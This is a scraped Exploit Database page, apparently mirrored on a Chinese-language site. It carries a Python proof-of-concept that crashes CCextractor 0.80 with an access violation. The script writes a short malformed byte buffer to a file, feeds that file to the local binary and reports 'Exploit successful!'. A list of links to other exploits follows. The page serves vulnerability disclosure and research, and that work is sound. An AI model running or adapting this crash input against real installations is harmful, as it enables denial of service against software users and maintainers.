CCextractor 0.80 – Crash (PoC)

Exploit Database
15 阅读

作者： David Silveiro

日期： 2016-05-31
类别：
- dos
平台：
- linux
来源：https://www.exploit-db.com/exploits/39873/

# Exploit Title: CCextractor 0.80 Access Violation Crash
# Date: 31st May 2016
# Exploit Author: David Silveiro (Xino.co.uk)
# Vendor Homepage: http://www.ccextractor.org/
# Software Link: http://www.ccextractor.org/download-ccextractor.html
# Version: 0.80
# Tested on: Ubuntu 14 LTS
# CVE : 0 day

from subprocess import call
from shlex import split
from time import sleep


def crash():

command = './ccextractor crash'

buffer = '\x00\x00\x00\x04ssixssixs'

with open('crash', 'w+b') as file:
file.write(buffer)

try:
call(split(command))
print("Exploit successful! ")

except:
print("Error: Something has gone wrong!")


def main():

print("Author: David Silveiro ")
print(" CCextractor 0.80 Access Violation Crash ")

sleep(2) 

crash()
 

if __name__ == "__main__":
main()

last Exploits
CCextractor 0.80 – Crash (PoC)的更多信息

Apple macOS Sierra 10.12.3 – ‘IOFireWireFamily-null-deref’ FireWire Port Denial of Service：
Opera SVG – Use-After-Free：
Microsoft Windows – ‘jscript!RegExpFncObj::LastParen’ Out-of-Bounds Read：
PCL Converter 2.7 – Denial of Service (PoC)：
BroadWin Webaccess Client – Multiple Vulnerabilities：
Able2Doc and Able2Doc Professional 6.0 – Memory Corruption：
Remote Desktop Gateway – ‘BlueGate’ Denial of Service (PoC)：
Wireshark – wmem_alloc Assertion Failure：